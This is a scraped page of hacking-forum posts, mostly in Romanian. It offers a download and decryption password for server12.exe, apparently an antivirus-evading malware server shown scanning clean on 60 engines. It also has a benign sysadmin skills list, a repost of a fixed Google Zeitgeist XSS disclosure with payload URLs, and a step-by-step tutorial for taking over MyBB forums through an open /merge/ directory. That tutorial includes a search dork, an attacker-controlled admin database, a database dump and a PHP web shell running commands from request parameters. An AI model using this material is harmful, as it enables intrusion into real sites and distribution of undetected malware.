Leaderboard

tested and working with DC... Download:https://mega.co.nz/#!e9YV2ZxJ!jAzUxfOQZ5Vgbrwp4dmM_Eu8ZeEm9GFAYcIJV4efxPg Decrypt:File(Rijndael)--> password:YNSnYNSn ZONG22 Result: ( 0/60 ) A-Squared(Emisoft AntiMalware) Clean - Nothing Found Agnitum Clean - Nothing Found AhnLab V3 Internet Security Clean - Nothing Found ArcaVir Clean - Nothing Found Avast Clean - Nothing Found Avg Clean - Nothing Found Avira Clean - Nothing Found Ad-Aware Clean - Nothing Found Baidu AV Clean - Nothing Found BitDefender Clean - Nothing Found BKav Clean - Nothing Found BullGuard Internet Security Clean - Nothing Found ByteHero Clean - Nothing Found ClamAv Clean - Nothing Found Comodo Clean - Nothing Found Total Defense IS Clean - Nothing Found Dr. Web Clean - Nothing Found eScan Clean - Nothing Found eTrust-Vet Clean - Nothing Found eScan Internet Security Suite 14 Clean - Nothing Found ESET NOD32 Clean - Nothing Found Fortinet Clean - Nothing Found Fprot Clean - Nothing Found FSB Antivirus Clean - Nothing Found F-Secure Clean - Nothing Found Gdata Clean - Nothing Found Ikarus Clean - Nothing Found Immunet Antivirus Clean - Nothing Found IObit Malware Fighter Clean - Nothing Found K7Ultimate Clean - Nothing Found Kaspersky Internet Security 2013 Clean - Nothing Found KingSoft Clean - Nothing Found mcafee Clean - Nothing Found Microsoft Security Essentials Clean - Nothing Found nProtect Clean - Nothing Found NANO Antivirus Clean - Nothing Found Netgate Clean - Nothing Found Norton Internet Security Clean - Nothing Found Norman Clean - Nothing Found Outpost Security Suite Pro Clean - Nothing Found Ozone AV Clean - Nothing Found Panda Antivirus Clean - Nothing Found Panda Cloud Clean - Nothing Found PC Tools Clean - Nothing Found Quick Heal Clean - Nothing Found SUPERAntiSpyware Clean - Nothing Found Solo Clean - Nothing Found TotalDefense Clean - Nothing Found Trendmicro Internet Security Clean - Nothing Found TrustPort Antivirus 2014 Clean - Nothing Found Twister Antivirus 8 Clean - Nothing Found Unthreat AntiVirus BE Clean - Nothing Found Vba 32 Clean - Nothing Found Vexira Clean - Nothing Found Vipre Internet Security 2013 Clean - Nothing Found VirIT Clean - Nothing Found Webroot Clean - Nothing Found Zillya Clean - Nothing Found Zoner Clean - Nothing Found 360 Clean - Nothing Found Filename: server12.exe File MD5 Hash: 855cf99e3cc676fbae48dbe6400a3e6c File SHA1: 5a36053c3dfcc3d86c9b39ee669ec17ec5a6fc3a File Size: 1379986 Bytes Time Scanned: 18-02-14, 09:26:15 Scan provided by RazorScanner Link to Scan: RazorScanner - Scan Result

Am fost intrebat de cineva de aici ce cunostinte ar trebui sa aibe un sysadmin. O sa incep cu un sysadmin ce lucreaza in industria de hosting/securitate. Cunostinte standarde de monitorizare - Analiza loguri de sistem. - Monitorizare performante echipamente/retea. - Monitorizare conexiuni, incarcare servere, daemoni, conexiuni(tcp/ip). - Generarea de rapoarte in cazul in care se detecteaza probleme. Administrare echipamente (servere unix/linux, routere, etc ...) - Update-uri de securitate - Stabilire nivele de access - Instalare, configurare si tuning software open source - Cunostinte solide nginx, lighttpd, apache, mysql, postgresql, memcached, dns, networking, iptables, ipfilter, ipwf, packet filter - Cunostinte posix, environmente, bash, acls - Cunostinte solide networking. - Cunostinte configurare routere (exemple: cisco, hp, juniper, force 10) - Cunostinte OSI Layers, LACP, BGP Stuff ... Evaluare infrastructura - Evaluarea infrastructurii IT existente. - Estimarea necesitatilor informatice reale pe termen mediu si lung Audit & Sec - Identificarea vulnerabilitatilor in site-urile web gazduite pe un sistem linux. (necesare cunostinte bune in php) - Cunostinte f. bune in logging. (trebuie sa stiti exact sa configurati la ce anume se face logging si cum se trimit alerte) - Determinarea punctelor slabe unui sistem informatic. - Generarea de rapoarte in cazul in care se detecteaza probleme. - Identificarea si inlaturarea serviciilor/software-ului care prezinta riscuri din punct de vedere al securitatii. - Proiectare si implementare firewall personalizat in functie de serviciile rulate. - Patching (compilarea kernelului din surse, patching, etc) (*hardening) Servere de email - Cunostinte solide despre postfix, qmail, exim, spamassassin, clamav, amavis, DKIM, SPF (spf este legat si de dns.) Management baze de date - Testarea bazelor de date inainte de mediul de productie - Diagnostic al performatelor bazelor de date - Optimizare (Tuning) MySQL/PostgreSQL - Analize de baze de date - Reorganizari baze de date - Replicari de date (replication) - Backup & Restore Pentru un sysadmin ce lucreaza intr-o corporatie aveti nevoie de mai multe: Oracle, RHEL, AIX, Solaris, LPAR ... si altele (depinde de caz)

Today’s story is an XSS with an interesting exploit on https://www.google.com/zeitgeist/2012/. It was reported by +Tomasz Bojarski. Zeitgeist 2012 uses the fragment identifier (the part of the URL after #) to load a snippet of HTML from a specified source and inserts it in the DOM. For instance https://www.google.com/zeitgeist/2012/#the-world will load https://www.google.com/zeitgeist/2012/partials/the-world.html So… could we make it load arbitrary URLs? Good question! Alas, this won’t work, because the URL is always constructed relative to the “partials/” directory: 'partials/' + <fragment> + '.html' But, could we use ../ to load another file in a different directory? Well, not exactly: Zeitgeist’s splits on "/", and then just takes the first part of the tokenized string. But not all is lost: +Tomasz Bojarski noticed that Chrome and Internet Explorer both replace "\" with "/" in URLs. So, he could use the "..\" pattern to include files from other directories, say: https://www.google.com/zeitgeist/2012/#\..\..\..\..\robots.txt? Now we have a way to load arbitrary files from www.google.com; Zeitgeist will simply insert them into the DOM as HTML. So how could we load an XSS payload instead of robots.txt? Of course, Tomasz didn’t stop there. He also discovered that Google Correlate allows users to upload structured data and later download it as a CSV file. You probably know where this is going: CSV file format doesn’t support any canonical way of escaping characters such as angle brackets, so Correlate serves them as-is. By itself, that’s not a problem - but if the CSV file is inserted as HTML into another document, we have a straightforward XSS bug: https://www.google.com/zeitgeist/2012/#\..\..\..\..\..\..\trends\correlate\csv?e=id%3aCSVID&t=weekly&p=us& We worked with both Zeitgeist and Correlate to fix this. First, we restricted what the fragment value can be. Secondly, the Correlate team decided to HTML escape the contents of the CSV file for good measure, too. We think this was an interesting exploit that combined a seemingly harmless bug with a legitimate feature to carry out XSS. Nice catch Tomasz!? Source : https://plus.google.com/u/0/+AlexisImperialLegrandGoogle/posts/gJDrVSuteUT

Pune ?i tu alt? criptare!To?i ?tiu s? decodeze base-ul.Sterge de tot sintaxa si d?-le-o doar celor care au reputa?ie / posturi de calitate.

.

Aceasta metoda functioneaza in cadrul platformei MyBB, am folosit-o si eu cu succes pe cateva site-uri, desi nu este chiar o vulnerabilitate ci mai degraba tine de prostia administratorului site-ului. Ce va ofera acest tutorial? Un ghid avansat despre cum puteti exploata un forum MyBB prin Open Merge Directory O metoda prin care puteti uploada un shell odata ce sunteti in interiorul panoului de administrare MyBB O baza de date actualizata continand un utilizator de admin pentru platforma MyBB Primii pasi Mai intai, descarcati urmatorul fisier SQL: http://1drv.ms/1bScHpY Apoi, creati un cont pe un website ce va permite importarea unei baze de date, de exemplu db4free.net - get a MySQL 5.6 Database for free, apoi logati-va in phpMyAdmin, selectati fisierul de mai sus, dupa care importati-l. Baza de date contine un cont de administrator in grupul SECONDARY, din motive de siguranta, ca sa nu fiti vazuti online pe forum. Parola default a contului este "ballsack". Acum, trebuie sa gasiti un forum care are directorul pentru merge deschis. Metoda mea favorita este sa intru in folderul meu Spam din mail si sa gasesc mesajele de gen "bla bla forum", prin care stiu ca nu m-am inregistrat pe acel forum. Odata ce ati gasit unul, accesati directorul /merge/ si vedeti daca functioneaza. Totusi, putem fi mai profesionisti si sa folosim dorkuri pentru a gasi acest director merge, pe forumuri la intamplare. Un exemplu bun este: intext:"MyBB Merge System - Version:" inurl:"/merge" Exploatarea directorului merge Odata ce ati gasit un website cu acest director deschis, veti fi intampinati de urmatoarea pagina: Apasati pe "Next". Asigurati-va ca cele doua fisiere au permisiunea de a fi scrise, si apoi apasati din nou "Next". Acum selectati "MyBB 1.6 (Merge)", si din nou apasati "Next". In cadrul paginii Database Configuration, apasati "Run" si veti fi directionati catre o pagina asemanatoare cu: Aici intervine acea baza de date, mai exact veti avea nevoie de detaliile de la db4free.net ; introduceti informatiile (hostul este db4free.net) ca in poza, dar desigur inlocuiti informatiile cu cele ale dvs: Verificati ca detaliile sa fie introduse corect si apasati din nou pe "Next". Acum, selectati optiunea Usergroups, apoi, dupa ce ati completat-o si pe aceea, selectati optiunea "Users". In cadrul acesteia, veti avea o pagina asemanatoare cu: Aici nu va exista nicio problema, deoarece avem doar un singur user nu va trebui sa schimbam vreo setare, deci pur si simplu selectam "Next". Gata! Acum am unit cu succes utilizatorul nostru de form. Nu incercati optiunea merge si pentru alte lucruri, deoarece ar fi fara rost. In schimb, navigati in josul paginii si apasati "Cleanup". Nu va ingrijorati despre pagina "Completition", pur si simplu duceti-va inapoi pe forum si logati-va cu detaliile utilizatorului. Dupa cum puteti vedea, pe forum aparem ca un simplu utilizator: Descarcarea in mod corect a bazei de date Exista un feature in platforma MyBB care ne permite sa descarcam bazele de date direct din ACP. Duceti-va la tabul "Tools and Maintenance", apoi selectati "Database Backups" din partea stanga. Apasati pe "New Backup". Vom avea ceva de tipul: Va trebui sa folositi optiunea "Select All", apoi sa schimbati tipul fisierului in Plain Text si sa apasati "Perform Backup", ca in imagine: Am terminat si acest pas, acum aveti o baza de date completa! Acesarea serverului din spatele MyBB Aceasta parte este una avansata, nu la fel de usoara ca si celelalte. Avem nevoie de pluginul forumului "Page Manager". Avem o problema insa, acest plugin nu ii ofera default oricarui administrator puterea de a il utiliza, ci numai super administratorului, dar vom trece peste aceasta limitare. Deci, sa urmam pasii. Duceti-va in prima pagina a panoului de administrare, selectati "Plugins" din lista din stanga. Cautati in lista si verificati daca "Page Manager" este instalat. Daca este, avem noroc! Acum duceti-va la tabul "Users & Groups", selectati "Admin Permissions". Selectati-va utilizatorul, apoi cautati in pagina textul "manage pages" si selectati "Yes". Acum salvati setarile facute, si aveti acces la page manager! Duceti-va la tabul "Forums & Posts" si selectati Page Manger din stanga. Acum creati o noua pagina, aveti grija ca ea sa nu fie afisata in forum, dar sa existe. Vom folosi urmatoarea comanda pentru a avea acces la o linie de comanda tip shell pe server: <?php $cmd = <<<EOD cmd EOD; if(isset($_REQUEST[$cmd])) { system($_REQUEST[$cmd]); } ?> Acest script pur si simplu face un request serverului cu comanda introdusa. Acum, duceti-va pe URL-ul creat, ar trebui sa fie ceva similar: http://hackedsi.te/misc.php?action=yourpage Acum, pentru a executa comenzi, trebuie sa folosim urmatorul URL (in acest exemplu, vom lista toate fisierele din directorul curent): http://hackedsi.te/misc.php?action=yourpage&cmd=ls _____________________________________________________________________________ Sper ca v-a placut tutorialul, astept comentariile si sugestiile voastre!